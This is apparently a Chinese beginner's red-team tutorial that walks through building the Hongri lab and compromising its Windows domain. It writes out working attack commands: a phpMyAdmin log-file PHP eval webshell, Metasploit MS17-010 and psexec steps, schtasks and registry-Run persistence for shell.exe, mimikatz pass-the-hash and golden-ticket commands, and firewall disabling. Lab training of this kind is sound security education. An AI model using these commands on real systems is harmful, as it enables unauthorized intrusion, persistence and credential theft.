新手也能懂的红队实战:从零搭建红日靶场到内网渗透完整复盘(附环境包)

张开发
2026/4/12 4:31:33 15 分钟阅读

分享文章

新手也能懂的红队实战:从零搭建红日靶场到内网渗透完整复盘(附环境包)
红队实战入门从零构建红日靶场到内网渗透全流程解析环境准备与靶场搭建红日靶场作为国内知名的渗透测试学习环境其设计模拟了真实企业内网架构包含Web服务器、域控服务器和域成员主机。对于初学者而言正确搭建环境是后续所有操作的基础。我们先从虚拟机配置开始网络拓扑关键点Web服务器Windows 7需要配置双网卡NAT模式192.168.134.135外部访问VMnet1192.168.52.143内网通信域控服务器Windows Server 2008192.168.52.138域成员主机Windows Server 2003192.168.52.141注意所有虚拟机默认密码为hongrisec2019建议在实验环境中使用正式环境必须修改常见搭建问题解决方案问题现象可能原因解决方法虚拟机无法联网网卡模式错误检查VMnet1是否启用Host-Only模式靶机之间ping不通防火墙未关闭执行netsh advfirewall set allprofile state off服务无法启动系统时间错误调整虚拟机时间至2019年左右信息收集与漏洞探测完整的渗透测试中信息收集往往占据70%的工作量。在红日靶场中我们需要采用分层递进的收集策略基础信息扫描whatweb http://192.168.52.143 # 识别Web框架 dirsearch -u http://192.168.52.143 -e php # 目录扫描关键发现处理发现phpMyAdmin后台时应立即检查版本-- 通过文档文件判断版本 SELECT version; -- 检查导出权限 SHOW VARIABLES LIKE secure_file_priv;突破点选择矩阵漏洞类型利用难度适用场景工具推荐弱口令爆破★★☆存在登录接口Burp Suite目录遍历★☆☆存在索引漏洞御剑扫描器SQL注入★★★存在查询接口sqlmap权限获取与维持通过phpMyAdmin获取Webshell是本次渗透的关键转折点具体实现路径日志写入法详细步骤开启全局日志记录SET global general_log ON; SET global general_log_file C:/phpStudy/WWW/shell.php;写入恶意代码SELECT ?php eval($_POST[cmd]);?;使用蚁剑连接时需注意选择PHP类型连接编码设置为UTF-8超时时间调整为30000ms经验提示内网环境中建议优先使用冰蝎等工具其流量特征更隐蔽权限提升检查清单[ ] 查看系统补丁systeminfo[ ] 检查服务权限accesschk.exe -uwcqv Authenticated Users *[ ] 查找敏感文件dir /s *pass* *.config内网横向移动实战获取立足点后内网渗透需要系统化的推进策略域环境侦查命令集net group Domain Admins /domain # 查询域管理员 nltest /domain_trusts # 查询域信任关系 nslookup -typeSRV _ldap._tcp # 定位域控制器MS17-010漏洞利用优化方案使用Metasploit进行精准探测use auxiliary/scanner/smb/smb_ms17_010 set RHOSTS 192.168.52.141 set THREADS 3 run漏洞利用失败时的备选方案尝试psexec远程执行use exploit/windows/smb/psexec set SMBPass hongrisec2019 set SMBUser Administrator权限维持技巧创建计划任务schtasks /create /tn Update /tr C:\shell.exe /sc minute /mo 1注册表自启动reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Backup /t REG_SZ /d C:\shell.exe域控攻防与总结在最终获取域控权限的过程中有几个关键转折点值得注意哈希传递攻击(PTH)sekurlsa::pth /user:Administrator /domain:god.org /ntlm:31d6cfe0d16ae931b73c59d7e0c089c0黄金票据制作kerberos::golden /admin:Administrator /domain:god.org /sid:S-1-5-21-1218 /krbtgt:310b643c5316c8c3c70a10cf8365e /ticket:golden.kirbi实战中遇到的典型问题及解决记录域控防火墙规则拦截通过已控主机执行netsh advfirewall firewall add rule nameRDP dirin actionallow protocolTCP localport3389杀软拦截mimikatz使用免杀版本或改用powershell版本横向移动速度慢设置set AutoRunScript post/windows/manage/migrate自动迁移进程

更多文章